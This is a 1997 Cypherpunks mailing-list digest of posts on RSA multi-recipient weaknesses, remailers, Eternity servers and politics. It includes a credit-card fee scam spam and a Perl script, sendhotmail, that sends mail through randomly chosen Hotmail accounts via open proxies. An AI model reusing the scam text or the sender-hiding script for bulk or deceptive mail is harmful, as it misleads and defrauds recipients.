From: sunder at brainlink.com (Ray Arachelian)
Date: Wed, 13 Aug 1997 04:12:44 +0800
Subject: Encrypting same data with many keys...
In-Reply-To: <199708121945.MAA16770@myriad.alias.net>
Message-ID: 



On Tue, 12 Aug 1997, Matthew Ghio wrote:

> Having identical plaintexts raised to the same power modulo different
> numbers makes the solution much easier.  If you have enough RSA
> encryptions of the same number to the same power, you can solve it
> outright by the remainder theorem.

So if I wanted to do this and use RSA, how could it be shielded from
attack?  I take it switching to DH or MH won't help.   Would Eliptic
Curves have different properties against this attack?

Maybe a random session key in the middle would help?

i.e.:	File[N]=RSA(PublicKey[n],RandomSessionKey[N]+IDEA(SessionKey[N],Data))


=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder at sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================






From vznuri at netcom.com  Tue Aug 12 13:17:21 1997
From: vznuri at netcom.com (Vladimir Z. Nuri)
Date: Wed, 13 Aug 1997 04:17:21 +0800
Subject: TCM goes to city council
In-Reply-To: 
Message-ID: <199708121951.MAA00280@netcom12.netcom.com>



TCM

>I attended a City Council meeting and spoke up on this point. I asked that
>if the "Food Not Bombs" folks were being arrested for distributing food
>without a license, that the cops also make arrests of the various groups at
>church picnics, Boy Scout outings, family picnics, etc., who also prepare
>and distribute food to groups. (Cooked under the same conditions, and
>distributed the same way.)
>
>The Council showed no reaction to my point, not that I expected to have any
>effect (dozens of others made similar points, that this was selective
>enforcement). The cops were told to keep busting people for distributing
>food, but no orders were given against church and social groups.

TCM attending a government sponsored meeting? participating in 
participatory government? voting with his voice in a democracy?

SCANDALOUS!!

whatever happened to the "f*** them all philosophy"?

hehehehehe

or maybe you will be using this little anecdote ad nauseam to
show the failure of democracy to individual wishes, and the 
tyranny of the majority?

seriously, if cypherpunks think government is so crappy, let see
them invent a better alternative than that which exists. note that
"anarchy" evades the problem completely. it's like saying, "I hate
my web browser" and someone saying, "oh, just get rid of it, the
alternative is far better".  an 8 year old would understand this
logic, but alas it eludes the cpunks after many moons on this list.

>"Some food distributors are more equal than others." Selective enforcement
>is the real power of the State.

agreed, the food policy you cite is strangely orwellian. however one
can somewhat sympathize with states which are in a bind here, in such a way
that you fail to mention the obvious ramifications. 

the more empathetic governments 
are toward the homeless, the more the state becomes a hangout
for them. would you like to see the homeless multiply in your
own jurisdiction? word gets around fast in these circles where the
best place to get a free lunch is, and they travel around the 
country to that place. 

you have a very rabid opinion on welfare as a redistribution of
income to those that don't deserve it. how is this food redistribution
program different? the fact that you don't pay for it? so you
aren't really objecting to leeching, just leeching off of your
money? and BTW, I believe "leeching" is a word that you have used
in your own posts on the subject, and is not something I'm inventing
here.






From ghio at temp0108.myriad.ml.org  Tue Aug 12 13:36:10 1997
From: ghio at temp0108.myriad.ml.org (Matthew Ghio)
Date: Wed, 13 Aug 1997 04:36:10 +0800
Subject: Encrypting same data with many keys...
In-Reply-To: <199708121945.MAA16770@myriad.alias.net>
Message-ID: <199708122027.NAA19252@myriad.alias.net>



> So if I wanted to do this and use RSA, how could it be shielded from
> attack?  I take it switching to DH or MH won't help.   Would Eliptic
> Curves have different properties against this attack?
> 
> Maybe a random session key in the middle would help?

Using a salt would work.  DH would be okay if you used DH to exchange
a different key with each recipient and then conventionally encrypted
the message with that key.

The point is that you need to use different (random) inputs to each P-K
operation in order to avoid the possibility of ending up with a system
of equations that could be solved.






From weidai at eskimo.com  Tue Aug 12 14:41:24 1997
From: weidai at eskimo.com (Wei Dai)
Date: Wed, 13 Aug 1997 05:41:24 +0800
Subject: Eternity Uncensorable?
In-Reply-To: 
Message-ID: 



On Tue, 12 Aug 1997, John Kelsey wrote:

> >If n>k this also increases reliability and resilience of the
> >eternity service against technical attacks.
> 
> This part is somewhat more useful.  However, n copies of the
> message are probably better.

The nice thing about information dispersal is that each share is only 1/k
the size of the original.

> I think the general problem here is unsolveable--running an
> Eternity server is just going to be a dangerous thing to do if
> you live somewhere where the police are likely to see
> possessing, distributing, or selling some of the information on
> it as a crime.  There are two possible solutions I can see:
> Either make Eternity servers so widespread that taking down
> individual servers in individual jurisdictions is futile, or
> find some jurisdictions where virtually *nothing* will provoke
> the police to act.  (Note that legal jurisdiction isn't the only
> issue here.  Some groups may be willing to use terrorist tactics
> to shut down these servers.)

The point of using information dispersal is not to defend the Eternity
servers, but rather the exit remailers.  Adam's Eternity servers do not
need to be defended because they only act as a gateway between USENET and
the web.  Clients can run Eternity servers on their local machine and
directly access their local USENET spool. 







From rah at shipwright.com  Tue Aug 12 15:00:20 1997
From: rah at shipwright.com (Robert Hettinga)
Date: Wed, 13 Aug 1997 06:00:20 +0800
Subject: Dept. of Commerce Forum on CAs
Message-ID: 




--- begin forwarded text


Mime-Version: 1.0
Date:         Tue, 12 Aug 1997 12:17:40 -0700
Reply-To:     Digital Signature discussion 
Sender:       Digital Signature discussion 
From:         "John D. Muller" 
Subject:      Dept. of Commerce Forum on CAs
To:           DIGSIG at VM.TEMPLE.EDU

     The Department of Commerce has started to build up a Web site with
     content from its request for comment and July 24 forum on public
     certification authorities.  Public comments submitted electronically
     are now online at http://csrc.nist.gov/ecforum.

     John Muller
     jmuller at brobeck.com

--- end forwarded text



-----------------
Robert Hettinga (rah at shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/







From rah at shipwright.com  Tue Aug 12 15:07:05 1997
From: rah at shipwright.com (Robert Hettinga)
Date: Wed, 13 Aug 1997 06:07:05 +0800
Subject: List of crypto-related courses
Message-ID: 




--- begin forwarded text


X-Sender: tnh at nepop.mediaone.net
Mime-Version: 1.0
Date: Tue, 12 Aug 1997 16:35:22 -0400
To: Robert Hettinga 
From: "Timothy N. Hill" 
Subject: Re: List of crypto-related courses
Cc: dcsb at ai.mit.edu, Avi Rubin 
Sender: bounce-dcsb at ai.mit.edu
Precedence: bulk
Reply-To: "Timothy N. Hill" 

At 14:51 -0400 97-08-12, Robert Hettinga wrote:
>--- begin forwarded text
>
>
>From: Avi Rubin 
>...
>
>   http:/www.cs.ny.edu/~rubin/courses.html

Make that

   
          ^         ^

 - Tim

Timothy N. Hill    "Let me tell you something, son,
Wellesley, Massachusetts, USA   Before you get much older.
   You cannot hit the ball, my friend,
PGP  3FAA C8B3 D7BB 9C93 882E   With the bat upon your shoulder."
     4221 2F66 EFF4 00C6 CF92    - Bill "Lord" Byron, The Singing Umpire



For help on using this list (especially unsubscribing), send a message to
"dcsb-request at ai.mit.edu" with one line of text: "help".

--- end forwarded text



-----------------
Robert Hettinga (rah at shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/







From dlv at bwalk.dm.com  Tue Aug 12 16:12:56 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 13 Aug 1997 07:12:56 +0800
Subject: HIP hip hooray
In-Reply-To: 
Message-ID: <1mccBe1w165w@bwalk.dm.com>



Mark Grant  writes:

> Zooko Journeyman (zooko at xs4all.nl) wrote:
> >HIP rocked. I'm still trying to adjust to the mundanity
> >of everyday life. I loved meeting some cpunks in Real
> >Life.

Do drop by whenever you're in NYC. :-)

> Hey, Zooko! You were the only Cypherpunk who made the article in the
> 'Independent' (by that blonde reporter who was wandering around), though
> Lucky Green was mentioned by name. 

Isn't it bad luck to mention Lucky Green by name?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From mornings at concentric.net  Wed Aug 13 07:13:47 1997
From: mornings at concentric.net (mornings at concentric.net)
Date: Wed, 13 Aug 1997 07:13:47 -0700 (PDT)
Subject: The Card!!!!!
Message-ID: <199708131412.JAA29399@dfw-ix10.ix.netcom.com>


CASH ADVANCE APPROVED:   YES                                  APPROVAL NUMBER: 000-458249
CREDIT LIMIT:                          $3,000.00                          APPROVAL EXPIRES: 09/01/97
CREDIT PROVIDER:                 MORNINGSTAR              BANK AFFILIATION:     NONE
CARD ISSUED:                          MORNINGSTARCARD    MEMBER STATUS:     PENDING
ANNUAL FEE:                            NONE                              APR:                             17.99%



DEAR FUTURE CARDHOLDER,

CONGRATULATIONS!  YOU HAVE BEEN PRE-APPROVED FOR A $3,000.OOO UNSECURED CREDIT LINE FROM THE FINANCIAL DIVISION OF MORNINGSTAR ENTERPRISES REGARDLESS OF YOUR PAST CREDIT.

YOUR APPROVAL NUMBER IS 000-458249 AND YOUR PRE-APPROVED CREDIT AMOUNT OF $3,000.00 FOR CREDIT PURCHASES AND CASH ADVANCES WILL BE AVAILABLE ONCE YOU RECIEVE YOUR MORNINGSTARCARD JUST BY CALLING NOW!

AS A MEMBERSHIP BENEFIT, YOU WILL BE PROCESSED*  AT NO COST FOR AN UNSECURED MAJOR CREDIT CARD WITH A CREDIT LINE OF UP TO $5,000.00 REGARDLESS OF PAST CREDIT.

SEND NO MONEY NOW  - THERE IS NO SECURITY OR MONEY DEPOSITS REQUIRED!  CALL IMMEDIATELY WITH YOUR APPROVAL NUMBER TO ACTIVATE YOUR MEMBERSHIP AND ITS BENEFITS.

BY ACTING NOW - WE'LL ASSIGN YOUR MORNINGSTARCARD WITHIN THE NEXT 48 HOURS AND THEN APPLY YOUR ONE TIME MEMBERSHIP FEE BY THE PAYMENT METHOD YOU PREFER.  IN ADDITION, YOU'LL RECEIVE $100.00 OFF YOUR FIRST CREDIT PURCHASE OVER $200.OO WITH THE MORNINGSTARCARD JUST BY CALLING NOW!

GETTING MORE CREDIT IS AS SIMPLE AS CALLING US TODAY T0 ACTIVATE YOUR MEMBERSHIP AND TO OBTAIN YOUR PIN CODE FOR CASH ADVANCES BEFORE YOUR APPROVAL EXPIRES.

SO CALL NOW AND GET THE CREDIT YOU DESERVE.  100% QUALITY ASSURANCE AND NO LESS!

                                            CALL RIGHT NOW(IF BUSY KEEP TRYING)
                                                 ********** 1-702-435-1930**************
                         FOR IMMEDIATE ACTIVATION AND ESTABLISH FOR CREDIT TODAY!

  * YOU MUST CALL TO OBTAIN YOUR PIN CODE FOR CASH ADVANCES AND FOR MEMBERSHIP ACCEPTANCE ALONG WITH OBTAINING COMPLETE DETAILS OUTLINING OUR PROGRAM!





From ulf at fitug.de  Tue Aug 12 17:10:45 1997
From: ulf at fitug.de (Ulf =?iso-8859-1?Q?M=F6ller?=)
Date: Wed, 13 Aug 1997 08:10:45 +0800
Subject: Eternity Uncensorable?
In-Reply-To: <199708061308.OAA02171@server.test.net>
Message-ID: 



>Turn of logs, and introduce forward secrecy into mixmaster.  Easy to
>do.  Why don't we have it yet?  (Ulf?  Lance?)

It will not be in 2.0.4 final (unless someone sends me the code :),
but is high priority for 2.0.5.






From nobody at replay.com  Tue Aug 12 17:14:46 1997
From: nobody at replay.com (Name Withheld by Request)
Date: Wed, 13 Aug 1997 08:14:46 +0800
Subject: Cypherpunks are a bunch of happy people
Message-ID: <199708130005.CAA05800@basement.replay.com>



 Cypherpunks are a bunch of happy people

                                                                        basr

 Discussed were, amongst many other subjects, PGP encryption, building
 personal anonymous remailers, encryption of IP packets, and a kind of
 anonymous remailing system for IP packets (http, ftp, ...) using 'onion'
 servers.

 These guys promised us some nice stuff for our homes and schools in the
 near future like your own nice 'n' small anonymous remailer. If many people
 put these up and a system of anonymous remailers who give messages to each
 other before delivering it to the addressee is established, you can always
 say that *your* remailer was just one of the middlemen, receiving stuff
 from other anonymous remailers.

 Next, we are going to get cheap (under US $1.000) linux routerboxes that
 encrypt all traffic you send out to the network. Specially designed for the
 school and the home. This makes surfing in the childrens bedroom perfectly
 safe again!

 On the anonymous remailing of IP packets project the cypherpunks are workng
 together with the naval security of the USA. Why? These naval security
 people are working on the same thing, and they need other traffic using the
 same protocols to hide their own traffic in. Otherwise everyone can see
 they are transmitting from A to B. However, the cypherpunks had to explain
 the naval security first that if they want this technique more widespread,
 they have to make it available for cheaper machines and morre widely used
 operating systems... something they had not thought of themselves.

 You might think: "Is all this not illegal?" No it's not (yet, in most
 countries), and making up laws costs more time than writing good encryption
 software, so say the cypherpunks. That is... if they can find enough people
 to write the software. Yes, you guessed right, they are hiring!

http://magazine.dds.nl






From amp at pobox.com  Tue Aug 12 17:29:39 1997
From: amp at pobox.com (amp at pobox.com)
Date: Wed, 13 Aug 1997 08:29:39 +0800
Subject: Encrypting same data with many keys...
In-Reply-To: 
Message-ID: 



> > What are the dangers of taking a small block of data - say upto 1K in
> > size, then producing many files, each being the same data encrypted by
> > other keys?
> ...
> > Assume we're using 128 bit Blowfish/Idea or better, and discarding
> > weak keys.
> 
> For a standard block cipher there should be no problem.  For a stream
> cipher, you would have the same type of problems as for OTP reuse, but
> it would still be secure as long as you never reused a key.  However...
> 
> > What if instead of using a private key cypher, we used a public key
> > cypher?  Would that make any difference in attack methods?
> 
> Yes.
> 
> Having identical plaintexts raised to the same power modulo different
> numbers makes the solution much easier.  If you have enough RSA
> encryptions of the same number to the same power, you can solve it
> outright by the remainder theorem.

So would that then be a possible weakness in encrypting to multiple 
recipients with PGP? Probably not, since the actual data is encrypted with 
idea.



------------------------
Name: amp
E-mail: amp at pobox.com
Date: 08/12/97
Time: 17:37:16
Visit me at http://www.pobox.com/~amp

'Drug Trafficking Offense' is the root passphrase to the Constitution.

Have you seen 
http://www.public-action.com/SkyWriter/WacoMuseum
------------------------






From rubin at research.att.com  Tue Aug 12 17:39:03 1997
From: rubin at research.att.com (Avi Rubin)
Date: Wed, 13 Aug 1997 08:39:03 +0800
Subject: Correction: List of crypto-related courses
Message-ID: <199708130015.UAA28257@mgoblue.research.att.com>



Oops, I got the URL a bit wrong in my last posting. Here it
is again with the corrected URL.

For the last year or so, I have built and maintained a list of graduate
level courses on cryptography and security. The current list can be found
at 

   http://www.cs.nyu.edu/~rubin/courses.html

I would like to keep this list as current as possible, so if you have
any additions/corrections, etc, please let me know. I am only interested
in full-semester courses at universities.

Thank you,
Avi

*********************************************************************
Aviel D. Rubin                                 rubin at research.att.com
Secure Systems Research Dept.                Adjunct Professor at NYU
AT&T Labs - Research
180 Park Avenue                   http://www.research.att.com/~rubin/
Florham Park, NJ 07932-0971                    Voice: +1 973 360-8356
USA                                            FAX:   +1 973 360-8809

   --> Check out http://www.clark.net/pub/mjr/websec/ for a new
       book on web security (The Web Security Sourcebook).
*********************************************************************






From declan at well.com  Tue Aug 12 18:15:06 1997
From: declan at well.com (Declan McCullagh)
Date: Wed, 13 Aug 1997 09:15:06 +0800
Subject: Why the government should protect our privacy
Message-ID: 





---------- Forwarded message ----------
Date: Tue, 12 Aug 1997 20:15:33 -0400
From: Marc Rotenberg 
To: declan at well.com, Michael Sims 
Cc: fight-censorship at vorlon.mit.edu
Subject: Re: trustee, shmustee

At 7:46 PM -0400 8/12/97, Declan McCullagh wrote:
>On Tue, 12 Aug 1997, Michael Sims wrote:
>>
>> What groups want for privacy of individuals:
>>
>> Government: Lots
>
>Michael, thank you for reminding us of the Clinton administration's
>valiant efforts to protect individual privacy.
>
>I agree that we should blissfully ignore that we're talking about the
>Clipper Chip president, the Digital Telephony guy, the same fellow who
>will veto any pro-privacy crypto bill.  We should try to forget last
>year's anti-terrorism bill, push for roving and multipoint wiretaps, and
>FBI desires to ban nonescrowed domestic crypto. No longer should I be
>concerned about the administration's quest for enormous voracious
>databanks that will be tied together -- airport security, travel records,
>national id cards. And of course ACLU legislative counsel Don Haines is a
>fool when he speaks of "the Clinton-Gore effort to hardwire Big Brother
>into the information age.
>
>Silly me.
>

Declan is absolutely right. Good thing there are no real
privacy officials in the federal government and no privacy
laws for the Internet to get in the way of these efforts.

Has anyone else noticed that the most sweeping proposals
for surveillance are coming from the administration that
has backed the fewest privacy laws of any administration
in 30 years?

Mere coincidence? I don't think so.

Marc.




==================================================================
Marc Rotenberg, director                *   +1 202 544 9240 (tel)
Electronic Privacy Information Center   *   +1 202 547 5482 (fax)
666 Pennsylvania Ave., SE Suite 301     *   rotenberg at epic.org
Washington, DC 20003   USA              +   http://www.epic.org
==================================================================









From jrennie at hardy.ocs.mq.edu.au  Tue Aug 12 19:04:18 1997
From: jrennie at hardy.ocs.mq.edu.au (Jason William RENNIE)
Date: Wed, 13 Aug 1997 10:04:18 +0800
Subject: The BIG Lie (Jesus Confesses)
In-Reply-To: <199708121110.NAA25127@atro.pine.nl>
Message-ID: 



Actually i've tried to killthis thread by suggesting this in as in 
appropiruate forum for this but they insist on posting back

Jason






From froomkin at law.miami.edu  Tue Aug 12 19:14:51 1997
From: froomkin at law.miami.edu (Michael Froomkin - U.Miami School of Law)
Date: Wed, 13 Aug 1997 10:14:51 +0800
Subject: A peculiar notion
In-Reply-To: 
Message-ID: 



On Tue, 12 Aug 1997, Steve Schear wrote:

> So, if the people (legal voters in the states which planned to withdraw)

No, "the people" is the people of the united states as a whole.  The
federalist papers deals with this somewhere, where they explain that of
course the voting had to be organized state by state, because that tracked
the reality of how everything was organized, but nonetheless it was
intended to be a national pleblecite to produce a national government.

> had called a constitutional convention, whose vote was for withdrawl, it
> might (in your opinion) been a legitimate undertaking with binding result?

No. see above.
> I don't think the North would have accepted any withdrawl, not matter how
> it was decided within the South.

right.

[...]

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | "Cyberspace" is not a place.
U. Miami School of Law     | froomkin at law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin/
Coral Gables, FL 33124 USA | It's @%#$%$# hot here. 






From wombat at mcfeely.bsfs.org  Tue Aug 12 19:43:07 1997
From: wombat at mcfeely.bsfs.org (Rabid Wombat)
Date: Wed, 13 Aug 1997 10:43:07 +0800
Subject: Guy Polis (fwd)
Message-ID: 




Lame forgery.

-r.w.


---------- Forwarded message ----------
Received: from sirius.infonex.com (sirius.infonex.com [206.170.114.2]) by mcfeely.bsfs.org (8.6.12/8.6.12) with ESMTP id AAA19634 for ; Tue, 12 Aug 1997 00:48:20 -0400
Received: (from majordom at localhost) by sirius.infonex.com (8.8.5/8.7.3) id SAA11251 for cypherpunks-outgoing; Mon, 11 Aug 1997 18:52:35 -0700 (PDT)
Received: (from cpunks at localhost) by sirius.infonex.com (8.8.5/8.7.3) id SAA11069 for cypherpunks at infonex.com; Mon, 11 Aug 1997 18:51:57 -0700 (PDT)
Received: from rigel.cyberpass.net (root at rigel.infonex.com [206.170.114.3]) by sirius.infonex.com (8.8.5/8.7.3) with ESMTP id SAA11040 for ; Mon, 11 Aug 1997 18:51:47 -0700 (PDT)
Received: from toad.com (toad.com [140.174.2.1]) by rigel.cyberpass.net (8.8.5/8.7.3) with ESMTP id SAA16287 for ; Mon, 11 Aug 1997 18:49:20 -0700 (PDT)
Received: (from majordom at localhost) by toad.com (8.7.5/8.7.3) id SAA24951 for cypherpunks-unedited-outgoing; Mon, 11 Aug 1997 18:31:39 -0700 (PDT)
Received: from wombat.sk.sympatico.ca (wombat.sk.sympatico.ca [142.165.5.136]) by toad.com (8.7.5/8.7.3) with ESMTP id SAA24939 for ; Mon, 11 Aug 1997 18:31:33 -0700 (PDT)
Received: from default (lohner24.sk.sympatico.ca [142.165.98.24]) by wombat.sk.sympatico.ca with SMTP (8.7.1/8.7.1) id TAA03761 for ; Mon, 11 Aug 1997 19:27:46 -0600 (CST)
Message-ID: <33EFBCAD.5D8 at mcfeely.bsfs.org>
Date: Mon, 11 Aug 1997 19:30:21 -0600
From: Rabid Wombat 
Organization: Electronic Forgery Foundation
X-Mailer: Mozilla 3.01C-SYMPA  (Win95; U)
MIME-Version: 1.0
To: cypherpunks at toad.com
Subject: Re: Guy Polis
References: 
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-cypherpunks at cyberpass.net
Precedence: bulk
Reply-To: Rabid Wombat 
X-List: cypherpunks at cyberpass.net
X-Loop: cypherpunks at cyberpass.net

Dr.Dimitri Vulis KOTM wrote:
> There's a crackpot by the name of Guy Polis (guy at panix.com, polis_guy@
> jpmorgan.com) who posts a crackpot "cryptographic manifesto" and sounds
> like a bad troll intended to make the folks who promote the use of crypto
> look like, well, crackpots. Be warned.

Tim May wrote:
>  Yeah, and like we're gun-nuts, too!

The mammalian jackass is also claiming that all crypto promoters 
are marsupials.

-rw








From whgiii at amaranth.com  Tue Aug 12 19:48:13 1997
From: whgiii at amaranth.com (William H. Geiger III)
Date: Wed, 13 Aug 1997 10:48:13 +0800
Subject: A peculiar notion
In-Reply-To: 
Message-ID: <199708130240.VAA24024@mailhub.amaranth.com>



-----BEGIN PGP SIGNED MESSAGE-----

In , on
08/12/97 
   at 10:24 AM, "Michael Froomkin - U.Miami School of Law"
 said:

>It is consistent with the dual sovereignty thesis to say that "what is
>delegated can be withdrawn" but the entity doing the "withdrawing" is the
>people (by some democratic process, presumably, e.g. a new constitutional
> convention), not the states, for it is the people who did the delegation
>in the first place.  

But if the people of a State decide that they nolonger wish to be aligned
with the people of another state and their elected representaves act on
this what right does the people of the other state have in forcing them to
remain aligned.

Your argument seems to make some distinction between the rebel states and
the people they represented. Both were in agrement that the Union should
and must be disolved. A detailed study of the times will show that not
only did the vast majority of the people of the South support this but
that many in the North did also. If anyone was acting against the "will of
the people" it was Lincoln and the power broakers in DC (funny how little
things have changed).

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://www.amaranth.com/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBM/EQeI9Co1n+aLhhAQG7dwQAioxxnXsn33yzgVR7lg66uc+erIvrgPCn
gTSdyqDwvL57caBulfMzey+uHk1fEdb/fVu4+Utny6uxCJsg/vR6IVimAMWhfAjV
EHpuWaT7Wnf1uNk0ledjBMf3eJ15melPiutW6UPVm7LJv4z8yze4HgY07KQTS9bB
h4UE5SBMi8w=
=58X6
-----END PGP SIGNATURE-----






From wombat at mcfeely.bsfs.org  Tue Aug 12 19:49:13 1997
From: wombat at mcfeely.bsfs.org (Rabid Wombat)
Date: Wed, 13 Aug 1997 10:49:13 +0800
Subject: Forged headers
In-Reply-To: <19970812.020823.3662.1.travel23@juno.com>
Message-ID: 




Ask Toto.

On Tue, 12 Aug 1997, The Traveler wrote:

> Does anyone know of a URL where you can get information on how to forge
> headers and email addresses?
> 
> The Traveler
> 
> -----------------------------
> "Sometimes you're the bug, sometimes you're the windshield."
> 
> 






From iang at CS.Berkeley.EDU  Tue Aug 12 20:05:30 1997
From: iang at CS.Berkeley.EDU (Ian Goldberg)
Date: Wed, 13 Aug 1997 11:05:30 +0800
Subject: sendhotmail, version 1.2
In-Reply-To: <19970807192254.40.qmail@zipcon.net>
Message-ID: <5sqrsc$c8k$1@abraham.cs.berkeley.edu>



Here's version 1.2 of sendhotmail.

Now the only configuration option in the perl script itself is the location
of a config file.  That file should have the following form (you should change
the pathnames of the local files, of course):

---8<--- sample config file ---8<---
## The URL from which to fetch the current list of active proxies
Proxy List URL: http://www.publius.net/~remailer/proxy_list.txt

## The file in which to cache the above list
Proxy List Cache File: /home/iang/sendhotmail/proxy_list.txt

## How many days to cache the proxy list
Proxy List Cache Age: 1

## The file containing the list of hotmail accounts
Account List File: /home/iang/sendhotmail/accountlist
---8<--- sample config file ---8<---

Also, you'll need a list of valid hotmail account names/passwords in the
account list file to which you pointed, above.  This file contains a number
of lines, each of the form "login:password".  For example:

---8<--- sample accountlist file ---8<---
ldeliverer:xxxx
---8<--- sample accountlist file ---8<---

sendhotmail now picks a proxy and hotmail account at random.  I'll try to
keep the proxy list relatively up-to-date, and you need to keep your
account list up-to-date (in case Hotmail shuts one down, or something).

The perl program will "die" if something unexpected happens (such as the
proxy it chose didn't work, or the hotmail account was suddenly invalid).
Just try running it again (future versions will likely automatically
retry with different random choices for the proxy and the hotmail login).

   - Ian

#!/usr/bin/perl -w

##
## sendhotmail: pipe an RFC822 mail message into this, and it will send it
##              out from a hotmail account via an HTTP proxy
##
## Program by Ian Goldberg 
##

use LWP;

$uadirect = new LWP::UserAgent;

## The filename of the configuration file
$configfile = '/home/iang/sendhotmail/config';

## Read the config file
open(CONFIG, $configfile) or die "Cannot open $configfile: $!\n";
while() {
    next if /^\s*$/o;
    next if /^\s*\#/o;
    next unless /^([^:]+):\s*(.*)$/o;
    $value = $2;
    $name = "\L$1\E";
    $name =~ s/[^a-z0-9]//iog;
    $config{$name} = $value;
}
close(CONFIG);

## Get the proxy list
$proxylisturl = new URI::URL ($config{'proxylisturl'} ||
		'http://www.publius.net/~remailer/proxy_list.txt');
if (defined $config{'proxylistcachefile'}) {
    ## Check if the locally cached copy is new enough
    $maxage = $config{'proxylistcacheage'} || 1;
    if (! -e $config{'proxylistcachefile'} ||
	    -M $config{'proxylistcachefile'} > $maxage) {
	## Fetch a new copy
	$request = new HTTP::Request('GET', $proxylisturl);
	$request->header(Pragma => 'no-cache');
	$response = $uadirect->request($request);
	$body = $response->content;
	$newfname = $config{'proxylistcachefile'}.".new.$$";
	open(CACHE, ">$newfname") or die "Cannot write $newfname: $!\n";
	print CACHE $body;
	close(CACHE);
	rename($newfname, $config{'proxylistcachefile'}) or
	    die "Cannot rename $newfname: $!\n";
    }
    ## Read the proxy list
    open(CACHE, $config{'proxylistcachefile'}) or
	die "Cannot open $config{'proxylistcachefile'}: $!\n";
    @proxylist = grep (s/\n// && /^[^#]/, );
    close(CACHE);
} else {
    ## Just fetch from the net
    $request = new HTTP::Request('GET', $proxylisturl);
    $request->header(Pragma => 'no-cache');
    $response = $uadirect->request($request);
    @proxylist = grep (/^[^#]/, split("\n", $response->content));
}

@proxylist = ('secure.escape.ca:80') if $#proxylist == -1;

## Get the account list
if (defined $config{'accountlistfile'}) {
    open(ACC, $config{'accountlistfile'}) or
	die "Cannot open $config{'accountlistfile'}: $!\n";
    @accountlist = grep (s/\n// && /^[^#]/, );
    close(ACC);
}

@accountlist = ('ldeliverer:xxxx') if $#accountlist == -1;

sub escapetext {
    my $t = $_[0];
    $t =~ s/([\000-\037\200-\377\{\}\|\\\^\[\]\`\"\<\>\:\@\/\;\?\=\&\%\.\#])/"%".unpack('H2',$1)/eg;
    $t =~ s/ /+/g;
    $t;
}

sub getaddrs {
    my @addrlist = split(/,\s*/, $_[0]);
    my ($a, $ra);
    my @r;

    foreach $a (@addrlist) {
	$ra = '';
	if ($a =~ /\<(.*?)\>/) {
	    $ra = $1;
	} else {
	    $a =~ s/\(.*?\)//g;
	    $a =~ s/\".*?\"//g;
	    $ra = $1 if $a =~ /(\S+\@\S+)/;
	}
	push (@r, $ra) if $ra ne '';
    }
    join(', ', @r);
}

## Parse the incoming mail.  We need to put the To, Cc, and Bcc headers
## into a simple format that hotmail can understand.

$header{'to'} = '';
$header{'subject'} = '';
$header{'cc'} = '';
$header{'bcc'} = '';
$curheader = '';
while() {
    last if /^$/;
    chomp;
    if (/^\S/) {
	## Start a new header
	if (s/^To:\s*//io) {
	    $curheader = 'to';
	    $header{'to'} .= ', ' if $header{'to'} ne '';
	} elsif (s/^Cc:\s*//io) {
	    $curheader = 'cc';
	    $header{'cc'} .= ', ' if $header{'cc'} ne '';
	} elsif (s/^Bcc:\s*//io) {
	    $curheader = 'bcc';
	    $header{'bcc'} .= ', ' if $header{'bcc'} ne '';
	} elsif (s/^Subject:\s*//io) {
	    $curheader = 'subject';
	} else {
	    $curheader = '';
	}
    }
    if ($curheader ne '') {
	s/^\s*//;
	$header{$curheader} .= ' ' if $header{$curheader} ne '';
	$header{$curheader} .= $_;
    }
}
$header{'to'} = &getaddrs($header{'to'});
$header{'cc'} = &getaddrs($header{'cc'});
$header{'bcc'} = &getaddrs($header{'bcc'});
$msg = &escapetext(join('', ));

## Choose a proxy and account at random

srand(time ^ $$);
$proxy = $proxylist[int rand ($#proxylist+1)];
($login, $passwd) =
    $accountlist[int rand ($#accountlist+1)] =~ /^([^:]*):(.*)$/;

## Begin hotmail-specific magic

$ua = new LWP::UserAgent;
$ua->proxy('http', "http://${proxy}/");

$url = new URI::URL 'http://www.hotmail.com/cgi-bin/password.cgi';
$request = new HTTP::Request('POST', $url);
$request->header(Pragma => 'no-cache');
$request->content("login=${login}&curmbox=ACTIVE");

$response = $ua->request($request);
$body = $response->content;
$body =~ /\<\s*form\s+[^>]*action=\"(.*?)\"/io or die "Cannot log in";

$url = new URI::URL $1, $url;
$body = $';
$body =~ s/\<\s*\/form\s*\>.*//;
$body =~ /\<\s*input\s+[^>]*name=\"disk\"\s+value(=\"(.*?)\")?/io or die "Cannot give passwd";
$disk = $2 || "";

$request = new HTTP::Request('POST', $url);
$request->header(Pragma => 'no-cache');
$request->content("passwd=${passwd}&frames=no&disk=${disk}&curmbox=ACTIVE&login=${login}&js=no");
$response = $ua->request($request);
$body = $response->content;

$body =~ /\<\s*area\s+[^>]*href=\"(\/cgi-bin\/compose.*?)\"/io or die "Cannot compose";
$composeurl = new URI::URL $1, $url;
